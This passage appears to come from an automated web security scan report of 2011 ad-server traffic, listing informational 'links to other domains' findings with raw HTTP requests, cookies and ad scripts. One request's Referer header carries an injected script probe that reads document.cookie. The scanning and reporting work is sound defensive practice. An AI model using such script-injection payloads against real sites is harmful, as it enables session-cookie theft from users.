GET /server/ads.js?pub=6552283&cch=6553230&code=6554540&l=468x60&aid=25146571&ahcid=357440&bimpd=2wb0RWgXjYhVFhSdaZSvZ32VN1zGKOsk4ov2i8xHVnR0TwY8YE6gjVIS5MJFmkq2godKGQP5jeGRZOKTMN2DPtoklsfmT3ZxopeRfWXKmxbXuJDbTzEKBlvoWg22g08fQBLFzCXvYXkZJOm3FCPXkqPZwd49ogzwkuChi2oAN0q98Yd16mbfryO0v6b7W0VzMU1XDNtmd2fbCqHfl-bOLdphJr3EE0fC3CbZPy6kexTcMSjEcs4aHvsTkHfk60sItyKa63DoHWQFdWQuV51UaADBnZBrweC9c1vHrvKzBN7gz6f2eb9QWGoPXH87ysBrNA8vd4OeqOloKD4KO4hyFxcWjkdAxInVO9Grk85rDkUjqxRYx-TxGCSbMk0dlzlePuFYfd-0Dyn4P3apF4K7-ud30Lg4lLScyp28lK8k26xaeM3yn5dLx8Vmv7-WCyUiK43YnC00-N2rGpetgjUveL3wc-cQ7FRKnITKYzO3zYWcEISZYQ3K7SwVtCGhpriduMjxuTHZaiS7AIkfl75dGEmN4G-1ojp5K2MVoj7ClSFcv5-XUU5q4pXx6xAqrIe7hQsk85fZdNTnuj1_PDPsjnlx4A5fciM2ToJCqG_TCyWkfAEjXqI310WD2Pi5C3XIsFXYlHf7CLGcqzbXuxjA34TYJ7tTV8wwlrv7VDSXEBUy-EKCRGe7mtrcA-OGBKqnBsUx_9Fg59k79MGA4dHXJReht3ivBnz3hwow8XaUE6U&acp=AAABLbrqvaJXoHwA4-uMLkYoHs1YQ_fNzbFTEQ HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14999%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Thu, 27 Jan 2011 02:05:00 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Set-Cookie: fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Set-Cookie: pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 02:05:00 GMT
Content-Length: 9422


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;" WIDTH=468 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;">\n</SCRIPT>
...[SNIP]...
<A HREF="http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/http://ad.doubleclick.net/jump/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?">\n<IMG SRC="http://ad.doubleclick.net/ad/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?" BORDER=0 WIDTH=468 HEIGHT=60 ALT="Click Here"></A>
...[SNIP]...

20.7. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:
  • http://ads.pointroll.com/PortalServe/?pid=1149217T71620101123190930&flash=10&time=1|19:35|-6&redir=http://r.turn.com/r/tpclick/id/pNyBDcYPcXUfRwEAbAABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D/url/$CTURL$&pos=s&r=0.4512364394031465
The response contains the following link to another domain:
  • http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

GET /PortalServe/?pid=1149217T71620101123190930&flash=10&time=1|19:35|-6&redir=http://r.turn.com/r/tpclick/id/pNyBDcYPcXUfRwEAbAABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D/url/$CTURL$&pos=s&r=0.4512364394031465 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CDJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=D5990400-1924-8254-0209-118000C40100; PRca=|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 6312
Set-Cookie:PRvt=CEJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmqG8ONudAI5BCe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A19A0400-38BC-9DDB-0309-05A002390102; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy9A:1|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

if(!window.prRefs){window.prRefs={}}window.prRefs['AC931A6999-1254-44BB-9596-52F9E99E7F03']='%3C%3Fxml version%3D%221%2E0%22 standalone%3D%22yes%22%3F%3E%3Cprdata%3E%3Cviewcount%3E%3C%21%5BCDATA%5BAH0
...[SNIP]...
</style><object id='prflsA19A040038BC9DDB030905A002390102' name='prflsA19A040038BC9DDB030905A002390102' classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0 width='728' height='90' style='width:728px;height:90px'><param name='movie' value='http://speed.pointroll.com/PointRoll/Media/Banners/H&RBlock/832166/HRB_AD_728x90_BnrShell_010511_r05.swf?PRCampID=36954&PRPubID=tradingd&PRAdSize=728x90&PRFormat=FA&PRAd=1424
...[SNIP]...

20.8. http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1274126425/Right1/TOLMedia/House-TOL-Sky/smtol-120x600.jpg/72634857383030396f616f4141783156

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1274126425/Right1/TOLMedia/House-TOL-Sky/smtol-120x600.jpg/72634857383030396f616f4141783156

Issue detail

The page was loaded from a URL containing a query string:
  • http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1274126425/Right1/TOLMedia/House-TOL-Sky/smtol-120x600.jpg/72634857383030396f616f4141783156?x
The response contains the following link to another domain:
  • http://www.snowmobiletraderonline.com/

Request

GET /RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1274126425/Right1/TOLMedia/House-TOL-Sky/smtol-120x600.jpg/72634857383030396f616f4141783156?x HTTP/1.1
Host: ads.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884751287%7C1298476751287%3B%20s_lv%3D1295884751289%7C1390492751289%3B%20s_lv_s%3DFirst%2520Visit%7C1295886551289%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.1.10.1295884751;

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 22:29:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.snowmobiletraderonline.com/
Content-Length: 309
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.snowmobiletraderonline.com/">here</a>
...[SNIP]...

20.9. http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f4141783156

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f4141783156

Issue detail

The page was loaded from a URL containing a query string:
  • http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f4141783156?x
The response contains the following link to another domain:
  • http://www.aerotraderonline.com/

Request

GET /RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f4141783156?x HTTP/1.1
Host: ads.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884751287%7C1298476751287%3B%20s_lv%3D1295884751289%7C1390492751289%3B%20s_lv_s%3DFirst%2520Visit%7C1295886551289%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.1.10.1295884751;

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 22:29:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.aerotraderonline.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.aerotraderonline.com/">here</a>.</p>
...[SNIP]...

20.10. http://ads.tweetmeme.com/serve.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.tweetmeme.com
Path:   /serve.js

Issue detail

The page was loaded from a URL containing a query string:
  • http://ads.tweetmeme.com/serve.js?tag=home_leaderboard_iframe&width=728&height=90&rand=99954773672
The response contains the following link to another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /serve.js?tag=home_leaderboard_iframe&width=728&height=90&rand=99954773672 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:53 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: h03
Content-Length: 9228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TweetMeme Advert
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

20.11. http://ads.tweetmeme.com/serve.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.tweetmeme.com
Path:   /serve.js

Issue detail

The page was loaded from a URL containing a query string:
  • http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=600&rand=26297691596
The response contains the following link to another domain:
  • http://static.fmpub.net/zone/2673

Request

GET /serve.js?tag=home&width=300&height=600&rand=26297691596 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:54 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: h01
Content-Length: 9103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TweetMeme Advert
...[SNIP]...
<!-- advert: home_300x600 --><script type='text/javascript' src='http://static.fmpub.net/zone/2673'></script>
...[SNIP]...

20.12. http://ads.tweetmeme.com/serve.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.tweetmeme.com
Path:   /serve.js

Issue detail

The page was loaded from a URL containing a query string:
  • http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
The response contains the following link to another domain:
  • http://static.fmpub.net/zone/2671

Request

GET /serve.js?tag=home&width=300&height=250&rand=53705905654 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:54 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: ded2059
Content-Length: 9103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TweetMeme Advert
...[SNIP]...
<!-- advert: home_300x250 --><script type='text/javascript' src='http://static.fmpub.net/zone/2671'></script>
...[SNIP]...

20.13. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The page was loaded from a URL containing a query string:
  • http://adserver.teracent.net/tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=
The response contains the following links to other domains:
  • http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID,095352382072745203,TIMEID,1295921986&Redirect=http:/adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp?q=H4sIAAAAAAAAAFWQP2vDMBDFv8qdTn9d0VVTbFLoEozoUugUcGwlGVXXDk6InbnfunJITTsI3nv3051O7PtzO-zsBkizdICURrl6OKU4Kfp1mmviizPaKLmQUhoh9V9n-OJAc1hIMAa5LN3OoouNTUkimCCQklzYzUGaA9qYRLrqNAdM3kNFym2rMNgNS6M5B1wlYRgB3QUQmPJBACMUqe8K5rIiugtUIEo39P-neG5QIFfcx11ijB-ulRurQ2cJATyCJ-EBPdMeTSqEo11PdRjjrXfBUlpVCFBaInI33A42NmEKdey72lWWDHexDbYdL66pR3sOoXrK89gX_dR8jV07Du2luHUhT0RG6Sc0otEZlxzSaiIbs6q1m9f124v_eC-fH_f3-30RpuMUYtFO1_w8nM7ze7r6B_vAZTPRAQAA
  • http://pcdn.tcgmsrv.net/tase/images/toyota-inmarket/toyota_static_300.jpg
  • http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:48 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 02:19:47 GMT
Content-Length: 18077

<!DOCTYPE html>
<!-- Host: as2108 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<div id="noscript" style="height:250px;left:0;position:absolute;top:0;width:300px;z-index:10;">
